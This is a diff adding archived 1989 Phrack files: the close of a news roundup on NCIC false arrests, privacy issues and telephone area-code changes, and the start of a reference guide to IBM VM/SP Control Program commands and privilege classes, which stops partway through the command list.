+director of the news room operations, he is held ultimately for the actions of
+news staffers.  Shapiro and Cole were unavailable for comment.
+
+[Another story that discussed this case was "Television Editor Charged In Raid
+On Rival's Files" (February 8, 1989).  It appeared in Phrack World News Issue
+XXIV/Part 2. -KL]
+_______________________________________________________________________________
+
+National Crime Information Center Leads To Repeat False Arrest     May 14, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by James Rainey (Los Angeles Times)
+
+Mix ups with the databases at the NCIC have caused Roberto Perales Hernandez to
+be jailed twice in the last three years as a suspect in a 1985 Chicago
+residential burglary.  The authorities confused him with another Roberto
+Hernandez due to a single entry in the FBI's National Crime Information Center
+computer.
+
+The two Roberto Hernandezes are the same height, about the same weight, have
+brown hair, brown eyes, tattoos on their left arms, share the same birthday,
+and report Social Security numbers which differ by only one digit!
+
+The falsely imprisoned man has filed suit charging the Hawthorne, California
+Police Department, Los Angeles County, and the state of California with false
+imprisonment, infliction of emotional distress, and civil rights violations
+stemming from the most recent arrest last year.
+
+He had previously received a $7,000 settlement from the county for holding him
+12 days in 1986 before realizing he was the wrong man.  In the latest incident,
+he was held for seven days then freed with no explanation.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Another False Incarceration                                        May 18, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In his testimony on May 18, 1989 to the Subcommittee on Civil and
+Constitutional Rights of the Committee on the Judiciary of the U.S. House of
+Representatives, relating to the National Crime Information Center, David D.
+Redell cited another case of false incarceration concerning Roberto Perales
+Hernandez as well as various cases noted earlier -- such as that of Terry Dean
+Rogan [see below]:
+
+     "Only last week, a case in California demonstrated the potential
+     benefit of easy access to stored images.  Joseph O. Robertson had
+     been arrested, extradited, charged, and sent to a state mental
+     facility for 17 months.  During that entire time, mug shots and
+     fingerprints were already on file showing clearly that he was the
+     wrong man, but no one had taken the trouble to check them."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+These articles show clear examples of the damage and problems caused by this
+"super" database.  People like William Bayse (Federal Bureau of Investigation's
+Director For Technical Services) and William Sessions (Director of the FBI)
+either fail to realize this or perhaps they just do not care (as long as
+something similar does not happen to them).
+
+For those of you who are interested in looking into this further, the first
+article about this NCIC database was; "'Big Brotherish' Data Base Assailed,"
+(November 21, 1988).  It appeared in Phrack World News Issue XXII/Part 3.
+
+Another incident similar to the cases mentioned above concerned Richard
+Lawrence Sklar, a political science professor at the University of California
+at Los Angeles.  He was mistaken by the computer for a fugitive wanted in a
+real estate scam in Arizona.  Before the FBI figured out that they had the
+incorrect person, Sklar, age 58, spent two days being strip searched, herded
+from one holding pen to another, and handcuffed to gang members and other
+violent offenders.  For more details on this case and the case concerning Terry
+Dean Rogan, please refer to "FBI National Crime Information Center Data Bank,"
+(February 13, 1989) which appeared in Phrack World News Issue XXIV/Part 2 (as
+well as the Washington Post).
+_______________________________________________________________________________
+
+TRW and Social Security Administration                             May 12, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The credit bureau of TRW has been working with the Social Security
+Administration to verify its database of 140 million names and Social Security
+numbers.  In order to cover the cost, TRW is paying the Social Security
+Administration $1 million, while Social Security Administration will provide a
+matching $1 million.
+
+Since the Social Security Administration is asking for a budget increase for
+their computer and telecommunications systems, several legislators are outraged
+by the fact they they are spending $1 million for this non-government project.
+Claiming that the project is "as far away from the mission of the Social
+Security Administration as anything I have ever come across," Senator David
+Pryor (D-Ark) questioned the competence and credibility of Social Security
+Administration Commissioner Dorcas R. Hardy and asked for an investigation by
+the HHS inspector general.
+
+In addition, several lawmakers such as Dale Bumpers (D-Ark) believe the project
+to be a violation of civil liberties. Said Bumpers, "I don't like any public
+institution releasing an individual's private information."  The American Law
+Division of the Congressional Research Service has already concluded that the
+project is a violation of the Privacy Act of 1974.
+
+[A related article, "Verifying Social Security Numbers," (April 11, 1989)
+appeared in Phrack World News Issue XXVI/Part 3 (as well as the New York Times
+on the same date). -KL]
+_______________________________________________________________________________
+
+Phrack World News XXVII Quicknotes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+1.  The current name assigned to the new network being created by the merger
+    of BITNET and CSNET is ONENET.
+-------------------------------------------------------------------------------
+2.  NPA 903 Assigned to NE Texas (May 10, 1989) -- It was just announced that
+    those portions of 214 outside Dallas will be changed to 903 in the Fall of
+    1990.
+
+    With 708 assigned to Chicago, 903 assigned to Texas, and 908 assigned to
+    New Jersey, only 909 and 917 remain to be assigned before the format
+    changes.
+-------------------------------------------------------------------------------
+3.  Details On New Area Code 510 (June 6, 1989) -- The press release from
+    Pacific Bell, quoted in the San Francisco Chronicle, gives the phase-in
+    dates for the new NPA 510.
+
+    Inception is scheduled for October 7, 1991, with a four-month grace period
+    when NPA 415 will still work for the affected numbers.  Final cutover is
+    scheduled for January 27, 1992.
+
+    NPA 510 will encompass Alameda and Contra Costa counties, which currently
+    have 842,388 customers out of the current 2,005,687 customers in NPA 415.
+-------------------------------------------------------------------------------
+4. New Jersey Area Code To Be Split (April 27, 1989) -- The split is not
+   supposed to occur until 1991.  The new NPA will be 908 and it will basically
+   cover the southern "half" of the current 201 area.  The affected counties
+   will be Warren, Hunterdon, Middlesex, Union, Monmouth and Ocean, and the
+   southwest corner of Morris).  Counties remaining in 201 will be Sussex,
+   Passaic, Bergen, Essex, Hudson, and the majority of Morris.
+
+   New Jersey Bell will also start requiring area codes on calls into New York
+   and Pennsylvania that have been considered part of New Jersey local calling
+   areas.  This will apparently take effect October 2 and free up about 25
+   exchanges.  Information from the Asbury Park Press.
+
+       [This last line somewhat contradicts the first line as far as the
+       dates are concerned.  More information as we get it.      -- KL.]
+-------------------------------------------------------------------------------
+5. New Area Codes For London (April 27, 1989) -- British Telecom has announced
+   that the area code for London is to be changed on May 6th, 1990, due to the
+   increased number of lines needed in the capital.
+
+   The existing code is 01-, and the new codes to be introduced are 071- for
+   the centre of the city and 081- for the suburbs.  A list was published in
+   the Evening Standard, showing which exchanges will fall in which area.
+-------------------------------------------------------------------------------
+6.  Member Learns The Hard Way:  American Express Is Watching (May 4, 1989) --
+    This article taken from the San Jose Mercury News describes how American
+    Express called a member to voice their concern that he might not be able to
+    pay his recent bill.  American Express was able to access his checking
+    account and find that he had less than what was owed to them.  His card was
+    temporarily "deactivated" after the member refused to give any financial
+    information except that he would pay up the bill with cash when it came in.
+
+    Apparently, the card application, in finer print, declares that "[American
+    Express reserves] the right to access accounts to ascertain whether you are
+    able to pay the balance."  After some arguments with the company, the
+    member comments that "I learned a lesson:  My life is not as private as I
+    thought."
+-------------------------------------------------------------------------------
+7.  Southwestern Bell's QuickSource (April 24, 1989) -- Southwestern Bell
+    Telephone Company is running a one year trial (March 1989 89 - March 1990)
+    of two information services:  QuickSource (audiotex) and Sourceline
+    (videotext).  The latter requires a terminal of some type, but the former
+    only requires a touch-tone phone for access.  The QuickSource number is
+    323-2000, but cannot be accessed via 1+713+; SWBTCo has blocked access to
+    "the Houston metro area served by SWBTCo," according to the script the
+    woman reads to you when ask for help (713-865-5777; not blocked).  The help
+    desk will send you a free QuickSource directory though.
+-------------------------------------------------------------------------------
+8.  Telemail, MCI, AT&T Mail Interconnection (May 16, 1989) -- U.S. Sprint's
+    subsidiary, Telenet has announced an interconnection agreement between
+    Telemail, Telenet's electronic mail product, MCI Mail, and AT&T Mail.
+
+    The new arrangement, scheduled to be in effect later this summer, will
+    allow the 300,000 worldwide users of Telemail, the 100,000 users of MCI
+    Mail and the 50,000 users of AT&T Mail to conveniently send email messages
+    to each other.
+-------------------------------------------------------------------------------
+9.  Illinois Bell Knocked Out For Four Hours! (May 18,1989) -- Service to over
+    40,000 Illinois Bell subscribers in the northwest suburbs of Chicago was
+    disrupted for about four hours because of problems with the computer in the
+    switching center.
+
+    Phones were either dead or inoperative for incoming and outgoing calls
+    between 9:30 a.m. and 1:40 p.m. because of a software glitch at the central
+    office in Hoffman Estates, IL.  Most of the disruption occurred in Hoffman
+    Estates, Schaumburg, Arlington Heights, Hanover Park, and Streamwood, IL.
+
+    The exact nature of the problem was not discussed by the Bell spokesman who
+    reported that the outage had been corrected.  Apparently the backup system
+    which is supposed to kick in also failed.
+-------------------------------------------------------------------------------
+10. SRI Attacked By Kamikaze Squirrels (May 29, 1989) -- It seems that the Data
+    Defense Network SRI's "no-single-point-of-failure" power system failed at
+    the hands, or rather the paws, of a squirrel.  The power was off for
+    approximately 9 hours and they experienced no hardware problems.  This was
+    at least the third time that a squirrel has done SRI in.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+11. New York Telephone Freebies (June 10, 1989)(San Francisco Chronicle, p. 2.)
+    -- 24 pay phones along the Long Island Expressway were in fact free phones
+    because of a programming/database screw-up.  They were being heavily used
+    for long distance calls by those who had discovered the oversight,
+    including many to Pakistan (Police found 15 Pakistani men using the phones
+    when they went to investigate after a shooting).  There were no estimates
+    on the unrecovered cost of the phone calls.
+_______________________________________________________________________________
+
+                     ***  END  ***
+
diff --git a/phrack27/2.txt b/phrack27/2.txt
new file mode 100644
index 0000000..952bf81
--- /dev/null
+++ b/phrack27/2.txt
@@ -0,0 +1,821 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 2 of 12
+
+
+                          Operating the IBM VM/SP CP
+
+             (IBM Virtual Machine System Product Control Program)
+
+                     An information article researched by
+
+                                  Taran King
+
+                                 May 18, 1989
+
+
+This article is for the purpose of understanding the Control Program (CP)
+portion of IBM's VM/SP.  This is basically a separate section of VM/CMS known
+as CP (with full screen editors, the CP level is indicated in the lower right
+hand corner of the screen and for line-by-line editors, before the command line
+and after hitting carriage returns, it should say "CP") and it's purpose is to
+manage real resources.  Any command that involves something outside of your
+virtual machine must communicate with CP.  If CMS does not recognize a command
+you give it, it will give it to CP.
+
+The user generally enters the CP stage after a program flops or if you get
+disconnected.  You can also enter the CP stage by hitting PA1 which is a
+function key of sorts.  PA1 toggles between CP and CMS while on-line and if you
+re-login after being disconnected, PA1 can be used besides the BEGIN command
+which will be spoken about later in this article.
+
+Generally, VM/CMS systems are well equipped with help files so if anything I
+print becomes unclear to you, from CMS mode, type HELP CP XXX where XXX is the
+CP command you want information on.
+
+To start this article off, I'm printing off the IBM-Defined Class and the
+Function Types as listed in the IBM VM/SP CP manual.  This essentially tells
+you what privileges you have with your assigned class.
+
+~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
+IBM-Defined      Function         User &
+   Class           Type          Functions
+~~~~~~~~~~~      ~~~~~~~~        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     A               O           Operations:  The primary sysop can issue all
+                                 class A commands.  The class A user controls
+                                 the VM/SP system.  Class A is assigned to the
+                                 user at the VM/SP system console during IPL.
+                                 The primary sysop is responsible for the
+                                 availability of the VM/SP system and its
+                                 communication lines and resources.  In
+                                 addition, the class A user controls system
+                                 accounting, broadcast messages, virtual
+                                 machine performance options, and other
+                                 command operands that affect the overall
+                                 performance of the VM/SP.  The sysop controls
+                                 operation of the real machine using the
+                                 system control panel and console device.
+                                 NOTE:  The class A sysop who is automatically
+                                 logged on during CP initialization is
+                                 designated as the primary sysop.
+
+     B               R           Resource:  The system resource operator can
+                                 issue all class B commands.  The class B user
+                                 controls allocation and deallocation of all
+                                 the real resources of the VM/SP system,
+                                 except those controlled by the primary sysop
+                                 and spooling operator.
+
+     C               P           Programmer:  The system programmer can issue
+                                 all class C commands.  The class C user
+                                 updates certain functions of the VM/SP
+                                 system.  The system programmer can modify
+                                 real storage in the real machine.
+
+     D               S           Spooling:  The spooling operator can issue
+                                 all class D commands.  The class D user
+                                 controls spool data files and specific
+                                 functions of the system's unit record
+                                 equipment.
+
+     E               A           Analyst:  The system analyst can issue all
+                                 class E commands.  The class E user displays
+                                 the contents of real storage, performs the
+                                 functions required to generate saved systems
+                                 and discontiguous saved segments, and
+                                 controls the collecting and recording of
+                                 performance measurement data.  This class of
+                                 user can display specified real storage areas
+                                 on the virtual operator's console or on a
+                                 spooled virtual printer, but cannot modify
+                                 real storage.
+
+     F               C           Customer Engineer:  The service
+                                 representative can issue all class F
+                                 commands.  The class F user obtains, and
+                                 examines, in detail, certain data about input
+                                 and output devices connected to the VM/SP
+                                 system.  The service representative can
+                                 establish extensive recording mode for one
+                                 I/O device at a time and can cause the
+                                 recording of repressible machine check errors
+                                 to be initiated or resumed.
+
+     G               G           General:  The general user can issue all
+                                 class G commands.  The class G user controls
+                                 functions associated with the execution of
+                                 his virtual machine.  A general user cannot
+                                 display or modify real storage.
+
+    ANY             ANY          The ANY classification is given to certain CP
+                                 commands that are available to any user.
+                                 These are primarily for the purpose of
+                                 gaining and relinquishing access to the VM/SP
+                                 system.
+
+~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
+
+The following is the list of commands available along with a brief description
+as to what they do and/or formatting and then ending with the IBM-Defined
+Class and Function Type.
+
+* : From CP, one may use the * command to annotate the terminal console sheet
+~   or the terminal display screen with a comment.  In other words, type * and
+then any string of characters you would, for some reason, to be present on the
+screen thereafter.
+Privilege Class:  ANY
+Function Type:  N/A
+
+#CP : This command is used to execute a CP Command while in a virtual machine
+~~~   command environment without first signaling attention to get to the CP
+command environment which means that when typing P <command> to perform a CP
+operation, CP directly receives the command whereas CP <command> merely queues
+the command from CP.
+Privilege Class:  ANY
+Function Type:  ANY
+
+ACNT : The ACNT command is used to create accounting records for logged on
+~~~~   users and to reset accounting data.  It also closes a spool file that
+is accumulating accounting records.
+Privilege Class:  A
+Function Type:  O
+
+ADSTOP : The ADSTOP command is used to halt the execution of a virtual machine
+~~~~~~   at a virtual instruction point.  The hexloc variable may be placed
+after the word ADSTOP which is a 6 character hexadecimal representation of the
+virtual instruction address where the execution is to be halted.  The OFF
+option of the ADSTOP command cancels any previous ADSTOP setting.
+Privilege Class:  G
+Function Type:  G
+
+ATTN : Use the ATTN command to make an attention interruption pending at your
+~~~~   virtual console.
+Privilege Class:  G
+Function Type:  G
+
+AUTOLOG : This command allows the user to log on any virtual machine defined
+~~~~~~~   in the directory.
+Privilege Level:  A, B
+Function Type:  O
+
+BACKSPAC : The BACKSPAC command is used to restart or reposition the current
+~~~~~~~~   output on a real punch or printer.
+Privilege Class:  D
+Function Type:  S
+
+BEGIN or B : The BEGIN command by itself from CP mode will return the user to
+~~~~~~~~~~   CMS mode in the place where he/she left off before he/she was
+disconnected or thrown into CP.  The BEGIN command can also be followed by a
+hex location as to where to start in the case of the user wanting to be doing
+something other than what was previously occurring.
+Privilege Class:  G
+Function Type:  G
+
+CHANGE or CH : In use of the CHANGE command, there are subcommands with
+~~~~~~~~~~~~   variables.  Generally, the "name" variable is 1 to 4 characters
+in length.  The following are the subcommands with functions and formatting:
+
+  o  READER or RDR : changes reader spool files.
+  o  PRINTER or PRT : changes printer spool files.
+  o  PUNCH or PCH : changes punch spool files.
+  o  CLASS c1 : designates an existing class where c1 is a 1-character
+                alphanumerical field from A to Z or 0 to 9.
+  o  spoolid : spoolid number of file that is to be changed.
+  o  FORM form1 : 1 to 8 character alphanumeric form name used to select files
+                  to be changed (form1).
+  o  ALL : changes all of your spool files.
+  o  HOLD : prevents a file from being printed, punched, or read until
+            released.
+  o  NOHOLD : releases the specified file from the user's HOLD status.
+  o  DIST dist : changes the distribution code to variable "dist".
+  o  COPY(*)nnn : specifies number of copies of the file you want spooled,
+                  which is valid only for printer or punch files.  "nnn" is a
+                  number from 1 to 255 and the "*" is  present in the case of
+                  a 3800 printer being used so that copies will be made in the
+                  printer internally.
+  o  FLASH name nnn : signifies that a form's overlay contained in the 3800
+                      printer is to be superimposed onto certain pages of
+                      output.  "nnn" is a number from 0 to 255 representing
+                      the number of copies to be superimposed.
+  o  MODIFY name (n) : allows text alteration by preventing information
+                       printing or by adding labels to output.  "n" selects a
+                       keyword in CHARS to be used for copy modification text.
+  o  CHARS name1 (name2(name3(name4)))
+     CHARS name1(CH names2(CH names3(CH names4))) : specifies character
+                       arrangement table when printing a file.  There can be
+                       up to 4 names.
+  o  FCB name : controls vertical spacing of output on a page.
+  o  FORM form2 : changes spool form name of file to form2.
+  o  NAME fn (ft) : assigns identification to spool file in CMS format
+                    filename and filetype.
+  o  NAME dsname : assigns identification to spool file in non-CMS format
+                   where "dsname" is from 1 to 24 characters, suitable for
+                   specifying OS or DOS files.
+Privilege Class:  S, G
+Function Type:  D, G
+
+CLOSE or C : The CLOSE command terminates spooling activity on any virtual
+~~~~~~~~~~   spooled unit record or console device.  It Contains the following
+subcommands to be followed by the letter C or the word CLOSE:
+
+   o  READER or RDR
+   o  PRINTER or PRT
+   o  PUNCH or PCH
+   o  FORM form1
+   o  HOLD
+   o  NOHOLD
+   o  DIST dist
+   o  NAME fn (ft)
+   o  NAME dsname
+   o  vaddr : virtual address (cuu) of device to be closed.
+   o  CONSOLE : closes virtual machine's console spool file which makes it a
+                printer spool file.
+   o  PURGE : closes and immediately purges from the virtual machine the
+              output spool files.  No output file is produced.
+   o  CHAIN : only valid for VM/SP HPO Release 4.2 and Profs Spool File
+              Enhancement PRPQ.  Indicates that the punchfile is to be
+              chained.
+Privilege Class:  G
+Function Type:  G
+
+COMMANDS or COMM : Use COMMAND to list the commands and diagnose codes you are
+~~~~~~~~~~~~~~~~   authorized to use.
+Privilege Class:  ANY
+Function Type:  ANY
+
+COUPLE : Using the COUPLE command connects your virtual non-dedicated
+~~~~~~   channel-to-channel device to another user's virtual device of the
+same type or to another one of your own virtual devices of the same type.  The
+format of this command is in the form of COUPLE vaddr1 TO userid vaddr2.  The
+variable vaddr1 is your virtual address and the variables userid vaddr2
+identify the userid and virtual address of that userid to be connected to.
+Privilege Class:  G
+Function Type:  G
+
+CP : The CP command may precede the command to be processed, but it is not
+~~   necessary.  Generally, the CP command is used from CMS mode to queue CP
+functions by typing CP <command>.
+Privilege Class:  ANY
+Function Type:  ANY
+
+CPTRAP : The CPTRAP command creates a reader file of a selected trace table,
+~~~~~~   CP interface, and virtual machine interface entries for problem
+determination.
+Privilege Class:  C
+Function Type:  P
+
+DCP : This command displays the contents of real storage locations at the
+~~~   terminal.
+Privilege Class:  C, E
+Function Type:  P
+
+DEFINE or DEF : The DEFINE command in CP is used to alter your virtual machine
+~~~~~~~~~~~~~   configuration or channel operating mode.  There are a LOT of
+subcommands that are used with the DEFINE command such as RDR or PRT or PCH
+and the list goes on and on.  If you want details, there is a help file (type
+HELP CP DEF) that is almost 600 lines that goes into detail on each
+subcommand.
+Privilege Class:  B, G
+Function Type:  R, G
+
+DETACH or DET : The DETACH command is used to remove a virtual device from the
+~~~~~~~~~~~~~   virtual machine.  The subcommands are as follows:
+
+  o  vaddr (vaddr...) : used for multiple addresses to be detached where vaddr
+                        is the virtual address (cuu) of the device to be
+                        detached.
+  o  vaddr-vaddr : used to detach a range of addresses.
+  o  CHANNEL c : detaches the real address of the channel.
+Privilege Class:  B, G
+Function Type:  R, G
+
+DIAL : Using the DIAL command logically connects a switched line, leased line,
+~~~~   locally attached, or remote Binary Synchronous (BSC) terminal to a
+previously logged-on multiple-access virtual machine.  It is in the format of
+DIAL userid (vaddr) where the userid is that to be connected to and the
+vaddr is the optional virtual address.
+Privilege Class:  ANY
+Function Type:  ANY
+
+DISABLE : The DISABLE command prevents low speed communications lines from
+~~~~~~~   accessing the system.
+Privilege Class:  A, B
+Function Type:  R
+
+DISCONN or DISC : The DISCONNECT command is used to disconnect your terminal
+~~~~~~~~~~~~~~~   from the system while the virtual machine continues
+operation.  Using the DISC HOLD or DISC HO option, you specify that the
+communications line is not to be disabled which allows you to avoid re-dialing
+the system.
+Privilege Class:  ANY
+Function Type:  ANY
+
+DISPLAY or D : The DISPLAY command allows you to display virtual machine
+~~~~~~~~~~~~   components at your terminal.  Depending on what variable
+follows the D or DISPLAY command from CP, you can display virtual storage
+locations, storage keys, general registers, floating-point registers, control
+registers, vector registers, VAC (Vector Activity Counter), VSR (Vector Status
+Register), VMR (Vector Mask Register), PSW (Program Status Word), CAW (Channel
+Address Word), and CSW (Channel Status Word).
+Privilege Class:  G
+Function Type:  G
+
+DMCP : This command prints the contents of real storage locations on a user's
+~~~~   virtual spooled printer.
+Privilege Class:  C, E
+Function Type:  P
+
+DRAIN : The DRAIN command stops spooling operations on a specified real unit's
+~~~~~   read devices after the file currently being processed has been
+completed.
+Privilege Class:  D
+Function Type:  S
+
+DUMP or DU : Use the DUMP command to print the contents of various components
+~~~~~~~~~~   of the virtual machine on the virtual spooled printer.  Depending
+on what variable is placed after the DUMP or DU command, the items printed
+include virtual PSW (Program Status Word), general registers, floating-point
+registers, control registers, storage keys, and virtual storage locations.
+Privilege Class:  G
+Function Type:  G
+
+ECHO or EC : Defaulted at 1, the ECHO command places the terminal in the echo
+~~~~~~~~~~   environment in which any line entered is transmitted unchanged
+back to the terminal a specified number of times, depending on the variable
+entered immediately after the word ECHO or EC.
+Privilege Type:  G
+Function Type:  G
+
+ENABLE : Use the ENABLE command to enable the previously disabled or nonabled
+~~~~~~   devices so users may access the system.
+Privilege Class:  A, B
+Function Type:  R
+
+EXTERNAL or EXT : The EXTERNAL command allows the user to simulate an external
+~~~~~~~~~~~~~~~   interrupt to the virtual machine and to return control to
+that machine.  The hexadecimal code following the word EXTERNAL or EXT is
+associated with the external interrupt, the default being the number 40 which
+is associated with the external interrupt button on a system console.
+Privilege Class:  G
+Function Type:  G
+
+FLUSH : The FLUSH command halts and immediately purges on hold the current
+~~~~~   output on a specified unit record device.
+Privilege Class:  D
+Function Type:  S
+
+FORCE : This command forces a logoff of any user of the system.
+~~~~~
+Privilege Class:  A
+Function Type:  O
+
+FREE : Use the FREE command to remove a set of spool files belonging to a
+~~~~   specified user from a system hold status.
+Privilege Class:  D
+Function Type:  S
+
+HALT : The HALT command terminates any active channel program on a specified
+~~~~   real device.
+Privilege Class:  A
+Function Type:  O
+
+HOLD : The HOLD command places user spool files in a system hold status.
+~~~~
+Privilege Class:  D
+Function Type:  S
+
+INDICATE or IND : At your terminal, you can display the use of and contention
+~~~~~~~~~~~~~~~   for major system resources with the INDICATE command.  The
+following variables that follow the word INDICATE or IND show the following
+data:
+
+  o  LOAD : shows number of users in queue 1 and queue 2, the usage of real
+            storage, and the ratio of active users to users being serviced.
+            This is done by returning values that indicate operating load on
+            the system.
+  o  USER : displays the amounts of system resources used by your virtual
+            machine in the current terminal session.
+Privilege Class:  A, E, G
+Function Type:  O, A, G
+
+IPL or I : Generally used to return to CMS via the IPL CMS  or I CMS command,
+~~~~~~~~   the IPL command simulates an initial program load function for a
+virtual machine.  Subcommands are as follows:
+
+  o  vaddr : virtual address (cuu) of the device that contains the nucleus to
+             be loaded.
+  o  cylno : cylinder containing the IPL data which defaults to 0.
+  o  nnnnn : block address containing the IPL data which defaults to 0.
+  o  CLEAR : sets virtual storage space to binary zeros before the operating
+             system is loaded.
+  o  NOCLEAR : allows contents of your virtual storage space to remain
+               unchanged prior to program load.
+  o  STOP : halts the virtual machine during the IPL procedure just before the
+            initial PSW is loaded.
+  o  ATTN : generates an attention interrupt to the virtual machine during the
+            IPL procedure.
+  o  PARM p1 (p2...) : processes up to 64 bytes of data to your virtual
+                       machine's general registers starting with the high
+                       order byte of general register 0.
+  o  systemname : simulates IPL function when loading a named system that was
+                  previously saved.
+Privilege Class:  G
+Function Type:  G
+
+LINK : The LINK command is used to make a device that is associated with
+~~~~   another virtual machine available at your virtual machine configuration
+based upon info in that user's directory entry.  This command is in the format
+of LINK TO userid vaddr1 AS vaddr2 (mode) ((PASS=) password(1)).
+Privilege Class:  G
+Function Type:  G
+
+LOADBUF : On a 1403 printer, the LOADBUF command loads the Universal Character
+~~~~~~~   Set (UCS) with a specified print train or chain image.  On a
+3203, 3211, 3212, 4245, or 4248 printer, it loads the UCS or the Forms Control
+Buffer (FCB) with a specified image.  On a 3289 Model 4 printer, it loads the
+Font Offset Buffer (FOB) with the image print belt and the FCB.
+Privilege Class:  D
+Function Type:  S
+
+LOADVFCB : This command specifies the forms control buffer image for different
+~~~~~~~~   virtual spooled printers.  The variables that follow it include:
+
+  o  vaddr
+  o  FCB : required reserved keyword meaning Forms Control Buffer.
+  o  name : a name that is system defined.
+  o  INDEX (nn) : place initial printing position in number nn for the 3211
+                  printer.
+Privilege Class:  G
+Function Type:  G
+
+LOCATE : Use the LOCATE command to find the addresses of CP control blocks
+~~~~~~   associated with a particular user, a user's device, or a real system
+device.
+Privilege Class:  C, E
+Function Type:  P
+
+LOCK : This command permanently locks in selected pages of real storage.
+~~~~
+Privilege Class:  A
+Function Type:  O
+
+LOGOFF or LOGOUT or LOG : Used to terminate a virtual machine session and
+~~~~~~~~~~~~~~~~~~~~~~~   disconnect your virtual machine from the system,
+this command can be used with the HOLD option (i.e.  LOG HOLD) for retaining
+the connection allowing for a switched communications line to enable one to
+log on without re-dialing the system.
+Privilege Class:  ANY
+Function Type:  ANY
+
+LOGON or LOGIN or L : Obvious enough, the LOGIN or LOGON command is used to
+~~~~~~~~~~~~~~~~~~~   identify yourself to the system and to access that
+system.  Following the words LOGIN or LOGON or L, type your userid which is
+the identifier assigned to you in the system.  If the system you are logging
+onto does NOT have password suppression, your password can follow directly
+after your userid.  NOTE:  If the system you are on does have password
+suppression (i.e.  it does not echo to your screen what you type when you type
+your password), you will get a system error message if you try to put it on
+the same line as your userid.  The NOIPL option, which would follow your
+password and userid, specifies that the IPL device or name in the directory
+should not be used for an automatic IPL.
+Privilege Class:  ANY
+Function Type:  ANY
+
+MESSAGE or MSG or M : Use the MESSAGE command to transmit message text to a
+~~~~~~~~~~~~~~~~~~~   specified userid or to the primary system operator
+userid.  MSG userid msgtext sends msgtext to the userid specified after
+userid. If userid is replaced with *, the text is sent to yourself.  Also, if
+the userid is replaced with OPERATOR, the message text is sent to the primary
+system operator regardless of his userid.
+Privilege Class:  A, B, ANY
+Function Type:  O, ANY
+
+MIGRATE : The MIGRATE command activates the normal page/swap table migration
+~~~~~~~   routines or forces a particular user's pages to a secondary device
+even if that user is currently active.
+Privilege Class:  A
+Function Type:  O
+
+MONITOR : To initiate or override the system-generated function or to
+~~~~~~~   terminate the recording of events occurring in the real machine, use
+the MONITOR command.
+Privilege Class:  A, E
+Function Type:  O
+
+MSGNOH : The MSGNOH command allows a service virtual machine to send messages
+~~~~~~   to specified users without the standard header associated with the
+MESSAGE command.
+Privilege Class:  B
+Function Type:  R
+
+NETWORK : The NETWORK command allows you to load, dump and control operation
+~~~~~~~   of a 3704 or 3705 and to control operation of a 3725 control program
+operating in 270x emulation mode (EP).  Also, it allows control of remote 3270
+devices via binary synchronous lines.
+Privilege Class:  A
+Function Type:  O
+
+NOTREADY or NOTR : Using the NOTREADY command causes the virtual device, which
+~~~~~~~~~~~~~~~~   is specified after the NOTREADY statement via cuu address,
+to appear as if it had changed from ready to not ready status.
+Privilege Class:  G
+Function Type:  G
+
+ORDER or ORD : ORDER is used to place your closed spool files in a specific
+~~~~~~~~~~~~   order by device type.  These spool files include READER,
+PRINTER, and PUNCH files and can be sorted by CLASS, FORM, and spoolid.
+Privilege Class:  D, G
+Function Type:  S, G
+
+PER : PER allows one to monitor certain events as they occur during program
+~~~   execution in the user's virtual machine.  This command can monitor the
+fetching and execution of an instruction, the execution of a successful branch
+instruction, the instruction of an instruction that alters a specific general
+purpose register, and the execution of an instruction in the virtual machine
+that alters storage.
+Privilege Class:  A, B, C, D, E, F, G
+Function Type:  G
+
+PURGE or PUR : Use the PURGE command to remove your own closed spool files
+~~~~~~~~~~~~   from the system before they are printed or punched by the
+spooling devices, or before they are read by a user.  The spool file
+specifications include READER, PRINTER, and PUNCH files as well as the ALL
+option which purges all of the above mentioned files.
+Privilege Class:  D, G
+Function Type:  S, G
+
+QUERY or Q : Also available in CMS mode, the QUERY command is used to
+~~~~~~~~~~   determine your system status and machine configuration.
+Although there are far too many subcommands of the QUERY command, the
+following is a list of items that may be queried.  I recommend, for full
+detail, using the HELP CP QUERY command as it is quite thorough (over 1000
+lines) in explaining the QUERY command.
+
+  o  The time you have used during a terminal session.
+  o  The number of closed input and output spool files associated with
+     your virtual machine.
+  o  The current settings of the color and/or extended highlight values
+     in effect for your virtual machine console.
+  o  The current settings of the SET command functions.
+  o  The current settings of the TERMINAL command functions.
+  o  The status of all the devices on your virtual machine.
+  o  The channel operating mode of your virtual machine, whether
+     block-multiplexer or selector.
+  o  A listing of all users who are linked to a given virtual address,
+     together with their device addresses and access modes.
+  o  Display of the secondary user (secuser) that is specified in the
+     CONSOLE directory statement.
+  o  Identification and attributes associated with your virtual
+     PRINTER, PUNCH, and READER spool files.
+  o  The identification of your virtual processor.
+  o  The mode of processor operation of your VM/SP HPO installation:
+     uniprocessor mode (UP), attached processor mode (AP), or
+     multiprocessor mode (MP).
+  o  The userid and system identifier.
+  o  A listing of the PER traceset elements.
+  o  The log messages of the day.
+  o  The names of the users that are logged on.
+  o  The number of users that are logged on or dialed to the system.
+
+NOTE:  There are other operands you can use with the QUERY command if you
+       have the privilege class required to use them.
+Privilege Class:  A, B, C, D, E, F, G
+Function Type:  O, R, P, S, A, C, G
+
+QVM : Use this command to request the transition from the VM/SP environment to
+~~~   native mode for a particular virtual machine.
+Privilege Class:  A
+Function Type:  O
+
+READY : In the format of READY vaddr, this command is used to set a device-end
